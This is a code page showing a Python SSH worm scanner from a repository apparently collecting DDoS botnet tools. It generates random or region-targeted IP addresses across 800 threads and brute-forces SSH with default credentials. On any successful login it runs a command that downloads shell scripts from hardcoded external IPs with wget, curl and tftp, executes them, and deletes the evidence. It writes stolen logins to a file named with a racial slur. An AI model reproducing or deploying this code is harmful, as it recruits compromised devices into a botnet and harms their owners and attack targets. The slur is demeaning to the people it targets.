Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/AUTOSCANNER/Gucci.py
5038 views
1
#!/usr/bin/env python
2
import threading, paramiko, random, socket, time, sys
3
4
paramiko.util.log_to_file("/dev/null")
5
6
#cmd='cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.207.132.137/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.207.132.137 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.207.132.137; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.207.132.137 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
7
cmd='cd /tmp; wget http://63.141.244.106/bins.sh || curl -O http://63.141.244.106/bins.sh; chmod 777 bins.sh; sh bins.sh; busybox tftp 63.141.244.106 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 63.141.244.106; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh'
8
blacklist = [
9
'127'
10
]
11
12
passwords = [
13
"admin:1234"
14
"guest:guest"
15
"user:user"
16
"test:test"
17
"ubnt:ubnt"
18
"root:root"
19
"root:admin"
20
"admin:admin"
21
"root:1234"
22
"pi:raspberry"
23
"vagrant:vagrant"
24
"admin:12345"
25
"12345:12345"
26
"admin:password"
27
"banana:pi"
28
"pi:banana"
29
"raspberry:pi"
30
"pi:raspberry"
31
"pi:pi"
32
"support:support"
33
"admin:default"
34
"root:password"
35
]
36
37
if sys.argv[4] == '1':
38
passwords = ["root:root"]
39
if sys.argv[4] == '2':
40
passwords = ["guest:guest"]
41
if sys.argv[4] == '3':
42
passwords = ["admin:1234"]
43
if sys.argv[4] == '4':
44
passwords = ["admin:admin"]
45
46
print "\x1b[0;31mScanner Started...\x1b[0m"
47
48
ipclassinfo = sys.argv[2]
49
if ipclassinfo == "A":
50
ip1 = sys.argv[3]
51
elif ipclassinfo == "B":
52
ip1 = sys.argv[3].split(".")[0]
53
ip2 = sys.argv[3].split(".")[1]
54
elif ipclassinfo == "C":
55
ips = sys.argv[3].split(".")
56
num=0
57
for ip in ips:
58
num=num+1
59
if num == 1:
60
ip1 = ip
61
elif num == 2:
62
ip2 = ip
63
elif num == 3:
64
ip3 = ip
65
class sshscanner(threading.Thread):
66
global passwords
67
global ipclassinfo
68
if ipclassinfo == "A":
69
global ip1
70
elif ipclassinfo == "B":
71
global ip1
72
global ip2
73
elif ipclassinfo == "C":
74
global ip1
75
global ip2
76
global ip3
77
def run(self):
78
while 1:
79
try:
80
while 1:
81
thisipisbad='no'
82
if ipclassinfo == "A":
83
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
84
elif ipclassinfo == "B":
85
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
86
elif ipclassinfo == "C":
87
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
88
elif ipclassinfo == "BRAZIL":
89
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
90
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
91
elif ipclassinfo == "ER":
92
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
93
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
94
elif ipclassinfo == "LUCKY":
95
lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","101.108","1.20","125.25","125.26","182.52","118.172","118.174","118.175","125.24"]
96
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
97
elif ipclassinfo == "LUCKY2":
98
lucky2 = [ "122.3","122.52","122.54","119.93","124.105","124.105" ]
99
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
100
elif ipclassinfo == "LUCKY3":
101
lucky2 = [ "103.20","103.30","103.47","103.57" ]
102
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
103
elif ipclassinfo == "RAND":
104
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
105
elif ipclassinfo == "INTERNET":
106
lol = ["1"]
107
self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
108
else:
109
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
110
for badip in blacklist:
111
if badip in self.host:
112
thisipisbad='yes'
113
if thisipisbad=='no':
114
break
115
username='root'
116
password=""
117
port = 22
118
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
119
s.settimeout(3)
120
s.connect((self.host, port))
121
s.close()
122
ssh = paramiko.SSHClient()
123
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
124
dobreak=False
125
for passwd in passwords:
126
if ":n/a" in passwd:
127
password=""
128
else:
129
password=passwd.split(":")[1]
130
if "n/a:" in passwd:
131
username=""
132
else:
133
username=passwd.split(":")[0]
134
try:
135
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
136
dobreak=True
137
break
138
except:
139
pass
140
if True == dobreak:
141
break
142
badserver=True
143
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
144
output = stdout.read()
145
if "inet addr" in output:
146
badserver=False
147
if badserver == False:
148
print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
149
ssh.exec_command(""+cmd+"")
150
nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
151
time.sleep(15)
152
ssh.close()
153
except:
154
pass
155
156
for x in range(0,800):
157
try:
158
t = sshscanner()
159
t.start()
160
except:
161
pass
162